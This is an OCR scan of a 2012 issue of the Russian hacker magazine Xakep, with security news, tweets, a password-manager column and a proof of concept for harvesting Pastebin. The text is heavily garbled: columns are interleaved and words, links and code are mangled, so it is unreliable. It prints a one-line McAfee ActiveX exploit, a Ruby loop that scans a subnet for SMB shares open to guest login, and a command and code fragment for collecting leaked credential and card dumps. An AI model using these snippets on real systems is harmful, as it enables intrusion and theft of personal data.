должен особенно обра д о в атыех, чьи глаза чувствитель­

она также и в России!. Ориентировочная цена 527В970

ны к так н аз ы ваемому <<к ри ста л ли ч ескому эффекту>> !он

состави т $1199.

ЭТА МУЗЫКА БУДЕТ ВЕЧНОЙ. ПАТЕНТНЫЕ ВОЙНЫ ПРОДОЛЖАЮТСЯ

APPLEOБBИHЯETSAMSUNG ELECTRONICS В ТОМ, ЧТО ЧЕХЛЫ ДЛЯ ПЛАНШЕТАGАLАХУТАВ 10.1

И СМАРТФОНОВ (!) НАРУШАЮТ ЕЕ ПАТЕНТЫ

010

ХАКЕР

03/158/ 2012


PhoneAndroid: Почти закончил с

linux.js. Да,

это

моя JаvаSсгiрt-реализация ядра

Linux.

[]

Почему вы на меня так

Яндекс, сnециалист по безопас­

Chгoot-ing в

ности веб-приложений: спе­

легко, как и А : , Б:, В : ...

циалист по безопасности веб­

http://Ьit . lv/yQQq_ml:J .

Windows- так

же

приложений в компанию Яндекс ...

Ь.it.lvд'ol.,m_!?.<J .

Комментарий:

Да, в винде тоже можно <<чрутить>> ...

lilcBekrar: Взлом Chгome с

ASLR + О ЕР­

обходом + ядреный сnлойт для

Комментарий: Конкурс Яндекса

El

по взлому сервисов прошел удачно;] . lil_sinnЗr:

обхода nесочницы за сов? Мы живем в разных мирах .

El

1О к бак­ #pwn2own

А вот и РоС для

lilcBekrar:

Комментарий: Фронтмен компании

Vupen

Большой #fаil-приз отправляется

возму­

к

щается призовым фондом предстоящего

конкурса

PWN20WN.

McAfee SaaS 0-day IZDI-12-012]: obj.ShowRepoгt "calc.exe" .

Защитные механи1мы

становятся все сложнее, и для их обхода требуется больше сил и вложений ...

McAfee

Secuгity-as-a-Service,

который устанавливает позор­

ный

ActiveX,

I:Jjt.jyд_bj..t_gf

Комментарий:

Вот и весь эксплойт- obj.ShowRepoгt

позволяющий выполнять код

"calc.exe".

via rathezdi.

пания устанавливает «бэкдорь~» клиентам.

Да ... вот так антивирусная ком­

А еще забавно, что эа такую

тила в районе

lilmartincronje:

lilmeder: Написал в блог о моем послед­

Один раз и для всех :

нем баге:

CSS

или JаvаSсгiрt-библиотек

типа

jQuery.

CVE-2011-3923.

Еще

одно удаленное исполнение

кода в Stгuts2: Ьlt.R:fiЬ.i.!JYLY.E.iЬ.ы.

El

0-day ZDI запла­ 1-2 к баксов . :] Вот так ...

El

Комментарий:

HTML5 !=

Комментарий:

Исходникам не доверяй никогда, Люк! Дебаггером воспользуйся вначале и убедись в потоке

Кэп ...

Сегодня у нас будет много ссылок­

общеобразовательный выпуск т витов, так сказать. Те, кто думает, что на

Java

lilmikesica:

можно

Любой хороший инженер лени­

кадить, не оnасаясь RСЕ-багов !ну как же,

вый, тем не менее, не каждый

Java- это ж секурно], подумайте еще раэ! Ведь накадить можно всякое ...

ленивый инженер хороший.

Если бы РНР был британским:

peгchance ifcondition] { // Code hеге}

otherwise { // Code hеге }.

liljcran: Написал новый блог-пост: поиск

багов в виртуальной машине с помощью «Докаэателя тео­

рем» - bl.lgД.pjt . [y/~J.gZ~К.

El

Комментарий:

Не фаззингам единым ... те, кто инте­

ресуется методами поиска уяэвимостей,

Ручной-- iгЬ> l1 .. 254].each {lxl puts "host- 10.0 . 0 . #{х}"; 'smbclient -L 10.0.0.#{х} -Uguest -N' }.

El

Комментарий:

RuЬу-скрипт для скана «шар» с учет­

кой гостя ...

обратите внимание на это.

lilstephenfewer: Открыл порцию исходников моей системы фаззинга для браузеров

Не знал о BinScope: hllQJLI:Ij_tJYLyzcQYR . Полезна

для

обнаружения бинарников без

NX, SafeSEH, /dynamicbase, и т . д.

'Fгindeг'- http:UЬit.lyLx.rUJJiW.

ХАКЕР

03/158/2012

.,,


В СЕТИ В ВИДЕ ТЕКСТОВОГО ФАЙЛА оказалисьданные о шести миллионах nоль з ователей крупнейшей в КНР комnании­ разработчика сетевого ПО (CSDNI.

MEGANEWS

МИНИСТР СВЯЗИ ПОСЕТИЛ

СОБРАНИЕ ПИРАТСКОЙ ПАРТ ИИ ПАРАДОКСАЛЬНО, НО ЭТО СОБЫТИЕ ИМЕЛО МЕСТО В РОССИИ

В хо д е бесе д ы с о Щ е ­

BSOD

В

WINDOWS 7

ЛЕГКИМ ДВИЖЕНИЕМ РУКИ НАЙДЕНА КРИТИЧЕСКАЯ ДЫРКА В ссСЕМЕРКЕн

голевым выясни­ л ось, ч то в це ло м о н

п о ддержи в аети д е ю о ткрыты х д анн ы х , н о д ек лар ац ию о т­ к рытого госуд а рства как-т о « не о цени л •>.

Кстати, официал ь ­

и

нф о р ма ция о н о вой н е за к рытой к ритиче с к о й у я з вим ос т и в Wind ow s 7 х6 4 вп е рвы е появила с ь в Т витт е р е изв ес тн о г о ха кера

w3bd3vi l. Б а г был wi n32k.sys [ н ео д но кр а т н ы й вин о вни к кри т ич ес ки х ошиб о к в Win XPI.

о бнар у ж е н в ф а йле операционной систем ы

ных коммента р ие в

ко т о ры й с о д е р жи т за в ис ящ у ю о т ядра ча с ть п о льз о ва­

п о поводупри­

т е л ьско г о ин т е р ф е йс а и о тн ос ящ уюс я к нем у инфрастр у к­

сутствия главы Ми н­ комсвязи на встреч е

ту р у. Зам е тим, чт о 32 - би тн а я в е р с ия ОС не во с nриимчива

членов Пиратск о й

к ош ибке, в то вр е мя к ак 6 4- б итная << Семерка » может

партиитак и не по­

н е толь ко у й т и и з-з а не е в

следова л о .

BSOD,

но и nозволяе т внедрить

в ма ш и н у вр е д о н ос ный к о д на у р ов не ядра. Однако самый ин т е р ес ны й нюан с з а к лючается в др у гом: пр о тотип кода , демонс т риру ющ е го , как вы з ы ва т ь данный с бо й, уже у тек в С е ть . О к а з а лос ь , ч то это пр ос т ой НТМ L- скрипт. Е г о з а­ п уск в б ра узе р е

Sa fari б ы с тр о пр иведет к ошиб ке с тра н и­

ц ы на н е спр е д е л е н на м у ча с т к е nамяти, и машина n о кажет

•с и н ий э кран с м е рти ». Этотскриn т представля е тсоб о й все г о лишь т е г

iframe с чр ез выч ай н о б о льшим атриб у том

высо т ы. Уя зви м ос т и т о чн о п о дв е р же на 64-битная версия

к

а к известно , в России П ира т екая партия даж е не зарегистрирована [нет,

Windows 7, о дн ако,

ребята пытались , но ничего не вы ш ло) . Тем не м е нее, пар т ия регулярно

ском п р о ме тир о в ан ы и др у г ие с и с темы. Патчана данный

nроводитсобрания,одноизкоторыхсостоялосьв с ерединея н варя

момен т н е су щ е ств уе т .

как от м е ч аю т э к с перты , м о г у т быть

в книж н ом магазине << Ц иолко в скиЙ>>, к~то ры й наход ится в зда н ии П олитехниче ­ ского музея . Д ля всех пришедших на совмест н ый сбор П иратской n артии, Ф он д а развития электронной демократии и рабочей группы << ИГ протест н ых действий>> стало полной неожиданностью появление в магазине Игоря Щ еголе в а , ми н и ­

стра связи и массовых коммуникаций РФ. П редсе д атель партии П а в ел Р ассуд о в nишет в своем ЖЖ : << М инистр сделал вид. как будт о зашел в в ы хо дн ой купит ь п ару к ниг и ничего не знал о н амечен н о м собрании. П рисутст в ую щи е н а в стре ч е п ро г раммеры с р азу нак ин ул ись на Щ е г оле в а. Ещ е быl Н е каж д ый д е н ь ес т ь возможность высказать в се что думаешь в лицо министру связи. Ау n р о гр ам ми­

стов было что ему сказать.

:1 Н о министрдержался молодцом, говорил ск л а дн о,

однако не сказал ничего конкретного. Сразу видно - большой опы т работ ы в аппарате >> . Щеголев ответил на ряд вопросов, за д анных учас т никами собра ­ ния. В частности, рассказа л , что за го д -по л тора в Р оссии може т б ыть вв е д е н а

система электронного голосова н ия, однако общество, по мне н и ю минис т ра, пока не испытывает nотребнос т и в такой системе. П одробности в ЖЖ П авла

Рассудова:

webpo lit.livejournal.com/72397.htm l.

NGIИX сс ВИНЧЕСТЕРНЫЙ» ГИГАНТ

NGINX ВЫШЕЛ НА ВТОРОЕ

ТН Е Pl RATE ВАУ &ОЛЬ-

-компания

МЕСТО по числу обслужи-

ШЕ НЕ &УДЕТ ХРАНИТЬ

TORRENTFREAKCOO&ЩАЕТ, чт о Cr ysis 2 стала

приобрелаподразделение

ваемых активных сайтов,

ТОRRЕNТ-ФАЙЛЫ и nолно-

с амо й скач и ваемойчерез

nомощью тут же обвинил

комnании

обогнав

стью п е р е й де т на magnet-

BitТo r rent игрой для РС

ссы л ки. Теn ерь magnet-U RL

в 20 11 г оду. С л едо м и дутСаll of Du ty: Modern Warfa r e 3 и Battlefield 3.

Google в nоддержке nиратства . В Google сnоко й но на-

Seagate-

Samsung по про-

изводству жестких дисков.

Суммасделкисоставила

$1,375 млрд.

012

Microsoft 115. По данным комnании NetCraft, на первом месте nока Apache (57,93 %).

предлаг аю т с я дл я загруз ки по умолчани ю .

МЕДИАМАГНАТРУПЕРТ

МЕРДОК завел Twitter и с его

звалиобвинение чушью .

ХАКЕР

03 /158/ 2012


GOOGLE НА ТРИ ГОДА ПРОДЛИЛАСОГЛАШЕНИЕ С MOZILLA об исnольз овании своего nоисковика в качестве основногодля Fiгefox .

БОЛЬШЕ КОЛОНОК, ХОРОШИХ

MICROSOFT, КОНКУРЕНТЫ

И РАЗНЫХ

ИАRМ-СИСТЕМЫ

СРЕДНИЙ ЦЕНОВОЙ СЕГМЕНТ И НЕИЗМЕННО ВЫСОКОЕ КАЧЕСТВО.

О НЕ ВСЕГДА ЧЕСТНОЙ БОРЬБЕ ЗА МЕСТО ПОД

КОНЕЧНО, ЭТО

СОЛНЦЕМ

EDIFIER

Е

ще в конце прошлого года компания

Microsoft

сделала заявление, которое породило у многих

нехорошие подозрения . Напомним, о чем идет речь .

В конце 2011-го компания

Microsoft впервые озвучила , что Windows8 будеттребовать Secuгe Ьооtдля загрузки [то есть обязательной активации режима безопасной загрузки

UEFII. Эта функция работа е ттак : UEFI сохраняет«секретные ключи >> в ОС. Все, что хочетзагрузиться на компьютер, к при­ меру операционная система, и с польз уе тэти ключи для до­

с туп а к

UEFI. Е сли в ОС не прописан соответствующий ключ ,

она не получит разрешение на загрузку. Liпu х-сооб ще с тво уже тогда попыталосьдонести до пр оиз водителей , что

реализовать передач у ключей в из-за чего установить

Linu x будет очень сложно, Linu x на заточенные под Windows8

устройствастанетпрактически невозможно.

Однако

Microsoft корректно пояснила , что не имеет Linu x и дру ги х о ткрыты х ОС , и сражается

ничего против

отнюдь не с ко нк у р е нтами , а с вредоносными кодами. Мол , безопасная загрузка тем и х ороша для работы

к

итайская компания Edi fieг представила в э том месяце сразу две новых модели. Об е новинки по­

полнили топовую линей ку систем

2.0. П ервое ауд ио-ре ш е ние- колонки R1500TM

с пр о­

фессиональным микрофонным входом, который имеет независимый регулятор громкости . Новинка может похва­

статься тради ц ионным для

Edifier деревянным

кор пусом

[что гарантирует о т сутствие резонансов!, НЧ-дина миками

napa

интересных

фактов : на заводах

компании Edifier производится более 12 млн комплектов мультимедийных к о лонок в год . За­ воды расположены на трех континен­

тах. Научно­ исследовательским

с магнитным экра н иро в а нием и 18-мм шел ковыми ку­

центром компании

полообразными твитерами . Стереосигнал, подаваемый

руководит всемирно

на входные разъемы

RCA,

обраба тывает ся схемой дина­

мическо г о повышения высоких частот, которая спе циаль­

известный инженер

вредоно сных программ. Надо признать, выглядит все это действительно логично. Но теперь

Microsoft подготовила док уме нте требова­

ниями, которые необходимо выполнитьдля сертификации компьютеров на со вместимо ст ь с Windows 8. Бумага , увы,

подтвержд ает худшие опасения. Здесьлучше всего про­ цитировать.

Официальн ое руко водстводляпроизводителей,желаю­ щи х пол учить сер тификацию Windows 8для своих ус тро йств,

и дизайнер Фил

с траница

Джонс .

мо реализовать возможность отключения

но разработана для мультиме диа.

Windows, что

такойпроцессперекрываетещеодинканалпроникновения

116: « В системах, не относящихся кАRМ, необходи­ Secure Boot через

интерфейсустановки прошивки . Физически присутствую­

Вторая новика-двухполосные колонки R900Т. Эта акустическая 2 . 0-система, оснащенная 4-дюймовыми НЧ-динамиками и 13-мм шелковыми куполообразными

щий пользовательд о лж е н иметь возможность отключить

Secure Boot через интерфейс установки, не владея Pkpri v. Программное отключение Secure Boot средствами UEFI

т ви терами, хорошо воспроизводитгл убок ий, богатый

не должно быть возможно ни во время за грузки , ни по ее

бас и зво нки е высокие частоты. Габариты

о кончании>>.

скромны:

140 х 226 х 197 мм.

R900T весьма

Колонки легко подключить

П олучается, заявление

Microsoft ото м, что она небу­

к выбранн ым источникам сигнала через 3,5-мм с тер еовхо д

деттребоватьотnроизводителей «ж елеза•запретить

RCA или RCA на RCA,

отключение

ко торые с п особ ны принять и уси лить

Secure Boot, на деле распространялось только

сигнал, поступающий с любого источника звука, и обес пе­

на традиционные ПК , н о не на АRМ-устройства. Пр оизво­

читьвысокоекачество звучания.

дит е ли систем, базирующихся на ар х итектуре ARM , теперь не до лжны предоставлять никаких способов отключения безопасной загрузки. Именно этот момент - обязательная

ПОВСЕМЕСТНАЯАВТОМАТИЗАЦИЯ

безопасная загрузка -ставит Linu x [и не только! в затруд­ нительное положение. Фактически это озна чает, чтотеперь для «за гружаемости >> на одной из таких машин , сертифици­ рованных на совместимость с Windows

ПО АДРЕСУ MEGASEARCH.CC ЗАРАБОТАЛ АГРЕ ГАТОР КАРДЕРСКИХ МАГАЗИНОВ, ТО ЕСТЬ РЕСУРС ДЛЯ ПОИСКА ВОРОВАННЬIХ БАНКОВСКИХ КАРТ ХАКЕР

03/158/ 20 12

8, соответствующий

ди с трибутив Linuхдолжен иметь се ртифицированные крип­ таключи от конкретного и з г отови т ел я компьютера. Вста е т ре з онный вопрос: где их взять? Е сли выдачей ключей будут за ниматься производители , то разработчикам ди стрибу ­ тивов придется отдельно контактировать с каждым из ни х.

Иеслиогромная ко рпорацияможет се бетакоепозволит~ толин укс оидам это врядли окажется под силу. Централи­ зова нного о ргана сер тификации , который бы формировал к лючи для режима безопасной загрузки

UEFI, не существует. Microsoft пытается бороться далеко н е только с малварью, но и с устано в к ой Linu x, Android и др у­ Словом, по хоже,

ги х открытых ОС на АRМ-системы.

013


MEGANEWS

КАРСТЕН НОЛ ИЭSECURIТY RESEARCH LАВS нашел очереднуюуязвимость в GSM . Подробности он пока не разглашает. ·

СКАЧАЙ И РАСПЕЧАТАЙ!

PWN20WN

ПИРАТИТЬ ЧЕРЕЗ СЕТЬ МОЖНО НЕ ТОЛЬКО ИНФОРМАЦИЮ,

ПРАВИЛА

МЕНЯЕТ

НО И ВПОЛНЕ РЕАЛЬНЫЕ ОБЪЕКТЫ

ПОПУЛЯРНЫЙ КОНКУРС В ЭТОМ ГОДУПРОЙДЕТ В НОВОМ ФОРМАТЕ

м

ы уже не ра з рас­

сказывали тебе о замечательномха­

кереком конкурсе

Pwn20wn,

учас тни кико т ороголомают

самый разный софт и желе­ зо, а nотом уносят с собой

хакнутыетрофеи [железные, конечно же) в качестве при ­ зов. Сообщаем, что в этом году правила соревнования

изменились. Теперь в конкур­ се участвуюттолько

з

Microsoft Apple Safaгi, Google Chrome и Mozilla lnteгnet Exploгer,

0-принтеры медленно , но верно про­ бираются на потребительский рынок .

Уже сейчас такой девайс [к примеру,

японскую

Firef oxдля операционных си­

iModela) мож но при обрести за пару

стем

вариант, а не жуткий промышленный станок не­

вообразимых размеров. С каждым днем об этих трехмерных чудесах прогресса появляется все

больше статей, постов, дискуссий. А раз интерес и спрос растут, появляется и предложение .

Ещ е пр о шлой осенью на т орре нт-тр екере

The Pirate Ва уоткр ыл ся

раздел с пр ограммами

для 30-принтеров, но какая-то активность наметиласьтамтолькосейчас.Д об рыелюди

Windows 7 и

Мае

05 Lion

[последние версии со все-

тысяч долларов, и э т о будет именно «домашний»

ми патчами). Мобильные

Одним из наиболее

девайсына конкурсе больше

известны х про·

взламывать не будут.

ектов по ЗD·печати является

RepRap

Главным сnонсором объявле-

-открытый прое к т

на компания

по созданию принте­

Hewlett- Packard. 30

р о в , способных

Три по бедителя получат денежныепризыв размере 60тысяч,

воспроизводить

тысяч и 15тысяч долларов плюстрофеи в виде н аутбуков с той самой

себя. Новейшая

системой , которую им удастся взломать.

модель называется

Mendel, и собрать

Компания

Google также учреди ла дополнительные призы 20 тысяч долла­

наконец-то начали делиться как программа ми,

ее способен любой желающий (это

так и реальными объектами. Уже сейчас в этом

действительно не·

ров за исnолнение sandbox-кoдa с исnользованием одной только

разделе можно с кача ть пластма ссово го робота

сложно!. Стоимость

уязвимости в

за взлом браузера Chгome. Она обе щает заплатить

всех компонентов

Chrome.

В

1О тысяч долларов оценивается

ис п олне н ие

из вселенной Warhammeг 40К или хот-род­

составляет всего

sandbox-кoдa с исnользованием уязвимастей как в Chгome, так и в

мо д е ль ш евроле

$520.

операционной системе.

1970 года .

Н о это безобидные

игру ш ки, а ведь в Сети уже некоторое время цир­

Но самое главное, что в этом году изменятся сами правила

кулируютслухи ото м, что на черном рынкетор­

Pwn20wn . Взломанная система теnерь не исключается

гуюти30-моделямискиммеровдлябанкоматов.

зания, как раньше . Все остальные участники имеют возможность

из состя­

Есть даж е n одтверж д е ния тому, что моше нни ки

в течение трех конкурсных дней взламывать ее своими методами.

действительнопольэуютсятакимимоделями!

Соответственно, результат соревнования теперь подсчитывается

Н е т, в « Б ухте» они пока не в сплывали, но это

no очкам.

явно воnрос времени . По хоже, у правоохрани­

В этом году

тельных органов по всему миру скоро появится

курсе можно участвовать и в удаленном режиме!

Pwn20wn

nройдете

7 по 9 марта.

Не забывай, что в кон ­

еще о дна головная боль .

КОМПАНИЯSОNУПРЕД­

СТАВИЛА КАРТЬI ПАМЯТИ

SONY

собственного формата

XQD.

Ориентированы они как на профессиональных фото­ графов, так и на энтузиастов.

В режимах чтения\эаписи

H

Seri senees

32 GB

пропускная способность

достигает

1 Гбит/с (125

XQD

Мб/с) .

ДВАДЦАТЬВОСЬМОГО

КОМПАНИЯ TIOBE SOFTWARE

Продажи уже начались. Карта

ЯНВАРЯ СТАРТОВАЛ ВТОРОЙ

УДОСТОИЛАОВJЕСТIVЕ-С

QD-H16 объемом 16 Г б стоит $130, QD-H32 на 32 Г б- $230,

FACEBOOK HACKERCUP,

ЗВАНИЯ «ЯЭЬIК ГОДА».

который проводится еже­

Однако на первом месте

Также представлены и устрой­

годно . Лучших ждет поездка

по популярнотипо-прежнему

ства для работы с новым

в штаб-квартиру Facebook,

стоит Java, а за ней идут С,

а победительполучитпять

С# и С++.

форматом.

тысяч долларов.

ХАКЕР

03/158/2012


• •

~ WI!XLI!Г.

www.wexler.ru

Электронная книга с доступом в Интернет

У SYMANTEC УКРАЛ И ИСХОДНЫЕ КОДЫ АНТИВИРУСА

Читай. Смотри. Слушай.

ХАКЕРЫДИСКРЕДИТИРОВАЛИПОПУЛЯРНОГО ВЕНДОРА

оддавлением хакеров компания Symaпtec, являющаяся одним из самых известных в мире поставщиков решений

в сфере информационной безопасности, была вынуждена признать, что хаке рам удалось получитьдоступ к исходному коду це ­

лого ряда ее прод уктов. По словам представителей Symaпtec, в ходе расследования было установлено, что кража исходного кода анти­

вирусов произошла еще в

2006 году.

После этого компания ввела ряд

мер для усиления безопасности, чтобы не допустить повторения по­ добных инцидентов в будущем. Хакерам удалось похитить исходные коды таких продуктов, как Nогtоп Aпtiviгus Согрогаtе Editi oп, Nогtоп l nteгпet Secuгity, Nогtоп SystemWoгks и pcAnywheгe версий

12.0, 12.5. Об утечке стало известно в середине прошлого месяца, когда некий хакер Yama Tough, причисляющий себя и к «Ано нимам», и к хакерекой группировке Lo гd of Dhaгmaгaja, написал в Твиттере, что располагает исходниками Noгton Utilities. В доказательство он 12.1

и

выложил ссылки на небольшой документ с описанием программно­ го интерфейса сервиса для создания о писаний образцов вирусов,

а затем и с писок файлов, содержащихся в архиве с исходным кодом Nогtоп Antiviгus. Опубликованный док у мент, кстати, датируется апрелем

1999 года.

Конечно же,

Symantec сразу сообщила,

что

информация из этого документа не может навредить нынешним продуктам компании. Зато архив с исход ным кодом компания не про­ комментировала.

П о заявлениям самих хакеров, информа цию им удалось выудить

с серверов ведомства военной разведки Индии. Иными словами,

у течка произошла не из сетей самой Symaпtec [хоть это радует). По некоторым данным, хактивисты опубликовали имеющуюся у них информацию, чтобы помочь судебному разбирательству, которое

недавно началось в США. Д есятого января против Symaпtec было выдвинуто обвинение в том, что она продвигаетсвою продукцию с помощью так называемых sсагеwаге-программ, которые запугива­

ют пользователей, извещая их о возможных проблемах с безопасно­ ст ью в особенно назойливой форме. Несмотря на все заявления Symaпtec, что у хакеров оказались старые данные, которые не могут нанести никакого вреда, раз­

работчики уже начали выпускать патчи. Компания предп очитает перестраховаться , вне зависимости оттого, откуда именно «утекла»

информация и насколько она актуальна на данный момент.

WEXLER.BOOK

МЫ ЛЕГИОН: ИСТОРИЯХАКТИВИСТОВ

ПРОФЕССИОНАЛЬНЫЕ ДОКУМЕНТАЛИСТЫ ИЗ КИНОКОМПАНИИ LUMINANT MEDIA СНЯЛИ

93-МИНУТНЫЙ ФИЛЬМ

О ВЕЛИКИХ И УЖАСНЫХ

ANONYMOUS ХАКЕР

Т7006

WI!XLI!Г. STORE

Удобный достуn к бесnлатным книгам и nоnулярные новинки.

Скачивайте и читайте на

www.wexler.ru!

:х:

о

«МЕТРО 2033» ДМИТРИЯ ГЛУХОВСКОГО И ЕЩ~

<t

ДВА РОМАНА КУЛЬТОВОЙ СЕРИИ БЕСПЛАТНО

Cl.. с:[

о

В ЭТОЙ ЭЛЕКТРОННОЙ КНИГЕ WEXLER

r::

03/158/2012 ТЕЛЕФОН ГОРЯЧЕЙ ЛИНИИ : 8 (800) 200 96 60


IEADER

КОЛОНКАСТЁПЫИЛЬИНА

ОХРАНЕНИИ ПАРОЛЕЙ ВЫБОР РЕШЕНИЯ

или извращаться с его синхронизацией через

активировать в аккаунте

Использовать один и тот же па роль для всех

тот же самый Dг орЬох . Дост уп к хранилищу

вые па роли, то войти без такого токе на будет

сервисов сразу- одна из самых серьезных

защищен мастер-ключом [сложным паролем),

уже невозможно. Каждый раз будет необхо­

ошибок пользователей. Но и удержать в голове

который в целях безопасности невозможно

дим о вставить флешку, запустить

огромное количество уникальных пассов­

восстановить. Будь осторожен!:)

использовать сгенерированный программой

НЕКОТОРЫЕ ФИШКИ LASTPASS Я не буду рассказывать о том, как использо­

Только в этом случае можно будет добраться до

задача явно непосильная. Я долго пытался

одноразо­

Sesame

и

параль вместе со своим мастер-ключом.

приучить себя к использованию менеджеров

па ролей вроде

LastPass

KeyPass [keepass.info), но

из этого так ничего и не вышло. Открывать

вать

программу, чтобы искать там нужный параль

могу не поделиться с тобой несколькими по­

-явно не самое удобное, что можно приду­

лезными фишками, которые меня порадовали .

LastPass,- там

все элементарно. Но не

мать. Да и локальное хранилище, в котором

хранилища. По отдельности что мастер-ключ, что флешка с

Sesame

ценности для злоумыш­

ленника уже не представляют.

Двухфакторнан авторизация через

Google

находятся зашифрованные па роли, попахивает

Проверка надежности па ролей

Для авторизации ты также можешь купить

архаизмом- не таскать же его на флешке?

Один только факт того , что па роли хранятся

настоящий токен-например YuЬikey за

Короче говоря, я решил попробовать решения,

в надежном хранилище, не делает их по­

[ stoгe.yuЬico.com ),- а можешь воспользовать­

которые так же, как и

настоящему безопасными.

ся уже готовым решением от

KeyPass,

:)

помогали бы

LastPass

с твоего

Google.

$25

Напомню ,

генерировать уникальные па роли и сохранять

разрешения может сделать быстрый анализ

что система от поискового гиганта предлагает

их, но вдобавок автоматически использо-

пассов, легко отыскав среди них простые и от­

установку насмартфон специального прило­

вали бы их в браузере! Вариантов тут не так

кровенно слабые [вроде

жения

много. Среди специализированных решений

му встроен бенчмарк, который высчитывает

«123456») . В програм­

[Google Authenticatoг), которая в каждый

момент времени генерирует уникальный одно­

наиболее раскрученной оказалась программа

показатель надежности всех паролей,- ре­

разовый ключ. Так как я постоянно пользуюсь

1Passwoгd [ agileЬits.com/onepasswoгd ), кото­

зультат можно сравнить с показателями других

этой системой для входа в

рая изначально появилась для Мае, но позже

пользователей в специальном рейтинге.

настроил ее и для защиты

Одноразовые парали

са йте 1helpdesk.lastpass . com/secuгity-options/

goog 1е -а ut hе nti саtог).

была портирована и для

Windows.

Продукт

очень качественный, но отдавать $69.99 за

Gmail, то я тут же LastPass . Подроб­

ную инструкцию можно найти на официальном

кроссплатформенную версию мне показалось

Многих, вероятно , смутит возможность до­

слишком. Тем более сегодня, когда практиче­

ступа к па ролям с помощью одного только

ски для всего можно найти бесплатную альтер­

мастер-ключа . Нет проблем! На флешку можно

одноразовые парали и двухфакторная автори­

нативу. Та ко вая, в общем-то, действительно

записать специальную утилиту LastPass Sesame [есть версии под любые ОС), которая,

зация доступны только платным подписчикам .

быстро нашлась-ейстал замечательный

сервис

по сути, превращает накопитель в токе н. Если

надежное хранение па ролей.

LastPass [lastpass.com), на котором я и

Справедливости ради стоит отметить, что

Но $12 в год- не такая уж большая плата за

остановился. Очень кратко опричинах, почем у

я выбрал его. Во-первых, сервис универсален

и работает под любой ОС

[Windows, Linu x, Мае),

Sign in to Gmaillj\Jith your

что было для меня важным критерием. Он имеет плагины для всех поп улярны х браузе­

Goug[e Account

ров [Fiгefox, lnteгne t Ехрlогег, Chгome, Safaгi, Орега). А платным подписчикам [$1 в месяц)

Dl Dl

доступны также версии для поп улярных

мобильных ОС . Во-вторых,

LastPass

Username: llpuser ::::==========~ ! Password:l••••••••

делает

ровно то, что от него требуется- автомати­ чески предлагает сохранить па роли и данные

форм, а затем подставляет их при следующем

D

посещении страницы. Е сли аккаунтов для какого-то сайта несколько, то можно быстро

Stay signed in 1 Sign in

переключиться с одного на другой. А если

J

для какого-то кривого сайта данные автома­ тически не парсятся, то это легко исправить

вручную. В-третьих,

LastPass

Can't access \'СUГ acccunt?

храни т зашифро­

ванные па роли в облаке, поэт ому хранилище с па ролями не надо носить с собой на флешке

016

LastPass

работает на любых устройствах и ОС

Автоматический вводлаги на и пара ля из базы

ХАКЕР

LastPass

03/158/ 201 2


Proof-of-Concept СОБРАТЬ ИНТЕРЕСНЫЕ ДАННЫЕ С PASTEBIN.COM И ПОДОБНЫХ СЕРВИСОВ

ХОСТИНГ ТЕКСТА

Такая популярность ресурса легко объ­

Максимально быстро и удобно расшарить лю­

яснима: каждый может опубликовать на нем

бой текстовый файл - такова миссия извест­

любые данные вообще без регистрации. При

ного онлайн-сервиса PasteЬin . com. Создатели

этом записи не пр оходят никакой премодера­

изначально рассчитывали, ч то их проектом

ции и тут же оказываются в Сети. Моментально.

будут активно пользоваться nрограммисты,

Руководство, конечно, удаляет прот ивозакон ­

которые легко смогут выкладывать на этом

ный контент по первом у запросу правообла­

ресурсе любые исходники с подеветкой синтак­

дателя или пострадавшей стороны, но к этому

писан на

Python,

то запускается всё из команд­

ной строки:

python gather.py -k kwords -о urls.db \ -а -"pastycake@gmail.com-" harvest Ключ 'haгvest' включает режим сбора

данных. Отчеты о найденных данных будут

сиса. И так вначале и было. Н о чего они точно

времени он уже успевает расползтись по Сети.

отправляться на указанный

не могли ожидать, так это бешеной популярно­

Это , в общем, история не только про PasteЬiп .

<< -О >>ис пользуется для выбора файла для

сти сервиса у хакеров . Вспомни все последние

сот, но и про др угие похожие сервисы:

вывода . А ключ

истории с взломами от Анонимов и

ключевых слов, на которые будет реагировать

-почти всегда для публикации конфиденци­

Pastie, FгubaгPaste, YouгPaste, Codepad, Slexy и Lodge lt. Идея сегодняшнего РоС- автомати­

альных данных [к примеру, дампов паролейl ис­

ческий сбор «интересных» данных с подобных

пожалуй, самое главн ое . Например, упо­

пользовался именно PasteЬiп.c om . За примерам

ресурсов. Иными словами, надо реализовать

мянутые выше сценарии были максимально

далеко ходить не нужно. Среди наиболее по­

инструмент, обходящий записи и по некоторым

адаптированы для поиска дампов с учеткам

Lulzsec

<<-k>>

e-mail.

Опция

позволяет задать базу

граббер . Вообще, настроить кейворды- это,

пулярных на текущий момен т записей [ pasteЬin .

ключевым словам собирающий большую базу

пользователей, логов чата, информации о кре­

com/tгends l несложно заметить, к примеру:

данных «интересного>> контента.

дитных картах и банковских аккаунтов. Список

• дамп каких-то учета к с Fa cebook; • внутреннюю базу данных какого-то

ключевых слов, используемых по умолчанию

взломан­

ного сайта, включая e-mail'ы пользователей

в

PastyCake, прямо

скажем, невелик:

Идея, на самом деле , не новая. В Сети можно найти немало написанных на коленке сценари­

и хеш и их па ролей;

СБОР ДАННЫХ

листинг IР-адр есов с привязкой к конкретным

организациям и компаниям.

ев: например , от malcOde [ Ьit . ly/Aп58Yd l или NeonTempest [ Ьit.ly/zRuК7o l. Но лучшей реа­

DEFAULT_KEYWORDS = [ 'password' , 'hack' ,

лизацией затеи, пожалуй, является сценарий

PastyCake от исследователя 9Ь+ [ Ьit. l y/xHXd f H I, de f

readke-fWOrd8 {fЬ&n.:llet:

который он опубликовал совсем недавно.

"'f7. tu~ [_.r s ;r1p(l for _ l n t hendl e ]

dtiГ

fltch (ltOIIif!, 10\lrCf!l, lritY"//rdl,

se trch_rc"'

l~t'e-UtCh):

N.c:~~~;~ilc( 'I' .]Oln(Ryvo:dsl)

for QC:Iera:.cr,

pt t.Ь

':ittt

s :&tus ,

in

про верить, как идея реализована на практике.

на хостингах PasteЬiп .com и Pastie.oгg и логи­

Дальше всё зависит от твоей фантазии.

ровать все записи, используя базу ключевых

s rc:.new_urls{ s to r a~11:):

• ;t ntrttor.~t..,;tttt(path)

слов. Результаты сохраняются в текстовом

! ull_url •IJ1!:!1eracor.!ull ..u:l{Jiath)

файле или базе данных

print •ts

NtC.Ьtd

SQLite.

В ближайшем

времени дополнительно появится поддержка

s coraoc . s avc_url(!ull_url, :uec:h.Qroup(l

Н

utch and stoa ..IOoltC:h a l sa

' ' ' t (!ll.ll_u:l,

"'~ 1

MongoDB

и

MySQL.

П оскольку сценарий на-

